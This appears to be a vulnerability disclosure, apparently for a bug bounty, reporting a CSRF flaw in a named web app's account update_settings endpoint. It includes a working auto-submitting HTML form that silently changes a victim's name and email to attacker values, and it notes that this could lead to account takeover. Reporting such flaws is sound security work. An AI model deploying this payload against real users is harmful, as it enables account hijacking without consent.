Description:
while working when am on the user setting option i have notice site are sending post request but there is no csrf token or any auth token which confirm the request is sent by current user or not then not even wait for exploiting csrf here
The application endpoint:
https://app.canopy.us/?a=account/update_settings
is vulnerable to Cross-Site Request Forgery (CSRF).
The endpoint processes sensitive account updates without validating a CSRF token or verifying the request origin, allowing an attacker to trick a victim into performing unintended actions.
i just create this code for exploiting
Auto-Submit CSRF PoC
<html>
<body>
<script>
history.pushState('‘, ’‘, ’/');
</script>
<form id="csrf_form" action="https://app.us/?a=account/update_settings" method="POST">
<input type="hidden" name="fName" value="Attacker" />
<input type="hidden" name="lName" value="User" />
<input type="hidden" name="email" value="attacker@mail.com" />
</form>
<script>
document.getElementById("csrf_form").submit();
</script>
</body>
</html>
Steps to Reproduce
- Login to the application as a legitimate user (victim)
- Save the PoC HTML file locally or host it on a server
- Ensure the victim is authenticated in the browser
- Open or send the PoC link to the victim
- The form auto-submits silently
- Observe that the victim’s account details are modified without consent
Impact
An attacker can exploit this vulnerability to:
Modify victim profile details (name, email, etc.)
Perform unauthorized actions on behalf of the victim
Potentially achieve Account Takeover (if email change is critical)
Chain with other attacks (e.g., password reset abuse)
